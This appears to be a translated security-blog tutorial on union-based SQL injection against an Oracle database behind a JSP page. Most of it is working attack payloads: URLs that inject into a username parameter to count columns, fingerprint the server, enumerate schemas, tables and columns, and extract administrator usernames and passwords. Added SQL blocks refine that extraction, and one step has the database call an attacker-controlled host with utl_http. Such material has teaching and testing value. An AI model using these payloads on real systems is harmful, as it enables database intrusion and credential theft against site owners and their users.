[Original] Web Security Chapter 4, SQL Injection Part 16: Oracle + JSP union query injection
1. Comment symbols
- -- (two hyphens): single-line comment, runs to the end of the line. Unlike MySQL, Oracle does not require a space after the hyphens; also note that # is not a comment character in Oracle.
- /* */ : multi-line comment
2. Testing whether the parameter is injectable
and 1=1 --
and 1=2 --
The page should render normally with 1=1 and differently (or empty) with 1=2. These forms suit a numeric parameter; for the string parameter used in the rest of this article the quote must be closed first, i.e. SMITH' and 1=1 -- versus SMITH' and 1=2 --.
3. Column count
Increase the ORDER BY position until Oracle raises ORA-01785 (ORDER BY item must be the number of a SELECT-list expression); the last position that still succeeds is the number of columns in the original query. Here the query has 8:
http://www.jsporcle.com/a.jsp?username=SMITH' order by 8 --
4. Union query
Oracle checks the datatype of every column position in a UNION, so fill the positions whose types are unknown with NULL, which is compatible with any type. Oracle also requires a FROM clause in every SELECT, and DUAL is the usual target: it is a real one-row, one-column table owned by SYS that every user can read, so selecting from it contributes exactly one injected row that must match the column count found above.
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,null,null,null,null,null,null from dual --
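A local walk-through of steps 3 and 4, added here as an example and not part of the original article. It creates a constructed EMP_DEMO table with the eight-column layout of Oracle's classic SCOTT.EMP (an assumption; the article never shows the table behind a.jsp) and runs the statement a.jsp would execute for each payload, so the ORDER BY limit and Oracle's per-position datatype check in a UNION can be observed without a target. The back-end query shape (select * ... where ename = '<username>') is also assumed.

```sql
-- Constructed stand-in for the table behind a.jsp (assumption: 8 columns like SCOTT.EMP).
create table emp_demo (
  empno number, ename varchar2(10), job varchar2(9), mgr number,
  hiredate date, sal number, comm number, deptno number
);
insert into emp_demo values (7369, 'SMITH', 'CLERK', 7902, date '1980-12-17', 800, null, 20);
commit;

-- Step 3, column count. Assumed back-end query: select * from emp_demo where ename = '<username>'
-- Payload username=SMITH' order by 8 --   (the trailing -- swallows the application's closing quote)
select * from emp_demo where ename = 'SMITH' order by 8;   -- succeeds
-- Payload username=SMITH' order by 9 --
select * from emp_demo where ename = 'SMITH' order by 9;   -- ORA-01785: ORDER BY item must be the number of a SELECT-list expression
-- so the query has exactly 8 columns.

-- Step 4, UNION. NULL is accepted in every position regardless of the column's datatype.
select * from emp_demo where ename = 'SMITH'
 union select null,null,null,null,null,null,null,null from dual;

-- Oracle checks datatypes per position: a string where EMPNO (NUMBER) sits fails with
-- ORA-01790: expression must have same datatype as corresponding expression
select * from emp_demo where ename = 'SMITH'
 union select 'a',null,null,null,null,null,null,null from dual;

-- Probe one position at a time to find a character slot; position 2 (ENAME, VARCHAR2) works:
select * from emp_demo where ename = 'SMITH'
 union select null,'a',null,null,null,null,null,null from dual;

-- Once a string slot is known, put the data subquery there (what the article does from step 5 on):
select * from emp_demo where ename = 'SMITH'
 union select null,(select banner from v$version where rownum=1),null,null,null,null,null,null from dual;

-- If only NUMBER positions are reflected in the page, pull the string one character
-- at a time as its ASCII code (here the first character of the version banner):
select * from emp_demo where ename = 'SMITH'
 union select ascii(substr((select banner from v$version where rownum=1),1,1)),null,null,null,null,null,null,null from dual;
```

Run the script in any Oracle session (the error statements are meant to fail; SQL*Plus continues after them unless WHENEVER SQLERROR EXIT is set). The same probe sequence, one position at a time, is how to find which of the eight NULLs in the article's payload can carry a string before moving on to step 5.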
5. Gathering Oracle information
Oracle version:
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null from dual --
1. Roles enabled in the current session: (select * from session_roles) (one column, ROLE; add where rownum=1 when placing it inside the union)
2. Database version: (select banner from sys.v_$version where rownum=1)
3. Server egress IP: make the database fetch a URL on a host you control with utl_http.request and read the connecting address in that host's web server log (needs EXECUTE on UTL_HTTP and, from 11g on, a network ACL)
4. Database host IP: (select utl_inaddr.get_host_address from dual)
5. Server operating system: (select member from v$logfile where rownum=1) returns a redo log path, and its form (/u01/... versus C:\...) reveals the OS
6. Instance name (SID): (select instance_name from v$instance)
7. Current user: (select SYS_CONTEXT('USERENV','CURRENT_USER') from dual)
8. Current user: (SELECT user FROM dual)
The v$ views and the UTL_* packages are not accessible to every account; a low-privileged application user may get ORA-00942 (table or view does not exist) or a similar privilege error for them. The data-dictionary views used from here on (ALL_TABLES, USER_TABLES, USER_TAB_COLUMNS) are readable by any user.
6. Finding schema (owner) names
Oracle has no list of databases as MySQL does; the equivalent is the set of schemas, i.e. the OWNER column of ALL_TABLES. The value 99 in the username makes the original query match no row, so only the injected row is displayed:
http://www.jsporcle.com/a.jsp?username=99' union select null,null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual --
To move to the next owner, exclude the ones already seen (system schemas such as SYS and SYSTEM will come first and take several iterations):
http://www.jsporcle.com/a.jsp?username=99' union select null,null,(select owner from all_tables where rownum=1 and owner <>'SYS' ),null,null,null,null,null from dual --
7. Finding tables
Table names must be written in uppercase: Oracle stores unquoted identifiers uppercased in the data dictionary, and the comparison in USER_TABLES is case-sensitive. USER_TABLES lists only the tables owned by the connected user; use ALL_TABLES with an owner filter for other schemas.
First table:
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual --
Second table (exclude the first one found, ADMIN):
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select table_name from user_tables where rownum=1 and table_name<>'ADMIN'),null,null,null,null,null from dual --
8. Finding columns
First column of table ADMIN:
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and rownum=1),null,null,null,null,null,null from dual --
Second column:
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1),null,null,null,null,null,null from dual --
Third column of table ADMIN:
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and column_name<>'USERNAME' and rownum=1),null,null,null,null,null,null from dual --
Result: the three columns of ADMIN are ID, USERNAME and PASSWORD.
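The rownum=1 plus <> exclusion chain used in steps 6, 7 and 8 grows by one condition per request and gives no idea of when to stop. The queries below, added here as an example and not part of the original article, fetch the Nth owner, table or column directly with row_number(), and count how many there are. The schema name SCOTT is an assumption used for illustration; the article never names the owner of ADMIN.

```sql
-- Nth schema (owner) in alphabetical order; change rn to step through instead of
-- chaining owner<>'SYS' and owner<>'...' conditions.
select owner from (
  select owner, row_number() over (order by owner) as rn
  from (select distinct owner from all_tables)
) where rn = 2;

-- How many owners to expect, so the loop has a stopping point.
select count(distinct owner) from all_tables;

-- Nth table in a chosen schema (assumed schema name SCOTT). user_tables only lists the
-- connected user's own tables; all_tables with an owner filter reaches every readable schema.
select table_name from (
  select table_name, row_number() over (order by table_name) as rn
  from all_tables where owner = 'SCOTT'
) where rn = 1;

select count(*) from all_tables where owner = 'SCOTT';

-- Nth column of a table in its physical order (column_id), the order a later
-- SELECT * would use; ordering alphabetically would scramble ID/USERNAME/PASSWORD.
select column_name from (
  select column_name, row_number() over (order by column_id) as rn
  from all_tab_columns where owner = 'SCOTT' and table_name = 'ADMIN'
) where rn = 3;

-- Each of these drops into the article's payload unchanged; the subquery stays in
-- parentheses and returns exactly one row, e.g. for the second owner:
-- username=SMITH' union select null,null,(select owner from (select owner,row_number() over (order by owner) as rn from (select distinct owner from all_tables)) where rn=2),null,null,null,null,null from dual --
```

row_number() has been available since Oracle 8i, so this works on every release the article's other queries run on. The count queries return a NUMBER; put them in a numeric position of the union, or wrap them in to_char() to place them in the string slot.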
9. Extracting data
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECT CONCAT(USERNAME,PASSWORD) FROM ADMIN),null,null,null,null,null,null from dual --
This works as written only while ADMIN holds a single row: a scalar subquery that returns more than one row fails with ORA-01427 and the page shows nothing. Add where rownum=1 and page through the rows with <> exclusions as for tables above, or aggregate the rows into one value. Note that Oracle's CONCAT takes exactly two arguments; the || operator accepts any number of operands and lets you put a separator between the fields so username and password can be told apart.
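The multi-row failure of the step 9 payload and three ways around it, added here as an example and not part of the original article. The ADMIN table and its two rows are constructed for the demo (the password values are placeholders, not real hashes); only the scalar subquery changes between the statements, so each one can be dropped into the article's union payload at the same position.

```sql
-- Constructed ADMIN table with the three columns found in step 8 (sample rows are made up).
create table admin (id number, username varchar2(30), password varchar2(64));
insert into admin values (1, 'admin',  'hash_of_admin_password');
insert into admin values (2, 'editor', 'hash_of_editor_password');
commit;

-- The article's payload as the database sees it. With two rows in ADMIN the scalar subquery
-- raises ORA-01427: single-row subquery returns more than one row, and the page shows nothing.
select null, (select concat(username, password) from admin), null from dual;

-- Option 1: one row per request. rownum = 1 limits the subquery to a single row, and ||
-- (any number of operands) replaces CONCAT (exactly two) so a separator can be added.
select null, (select username || ':' || password from admin where rownum = 1), null from dual;

-- Next row: exclude what has already been seen, as the article does for tables and columns.
select null, (select username || ':' || password from admin
              where rownum = 1 and username <> 'admin'), null from dual;

-- Option 2: the Nth row deterministically (works on any Oracle version).
select null, (select username || ':' || password
              from (select a.*, rownum as rn from (select * from admin order by id) a)
              where rn = 2), null from dual;

-- Option 3: every row in one cell (LISTAGG, Oracle 11gR2 and later).
-- Returns: admin:hash_of_admin_password,editor:hash_of_editor_password
select null, (select listagg(username || ':' || password, ',') within group (order by id)
              from admin), null from dual;
```

LISTAGG builds a VARCHAR2, so a large table overflows the 4000-byte limit with ORA-01489 (result of string concatenation is too long); fall back to option 2 and page in that case. The separator also matters for the article's CONCAT form: without it, a username ending in a hex digit and a hex hash merge into one ambiguous string.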
10. More queries
Current user:
SELECT user FROM dual;
All users:
SELECT username FROM all_users ORDER BY username;
All schemas (Oracle's equivalent of a database list):
SELECT DISTINCT owner FROM all_tables;
Table names:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
All columns of a table (uppercase table name, as above):
SELECT column_name FROM all_tab_columns WHERE TABLE_NAME='ADMIN';
Data file locations on the server:
SELECT name FROM V$DATAFILE;
Original article by mOon. If reposting, please cite the source: https://www.moonsec.com/120.html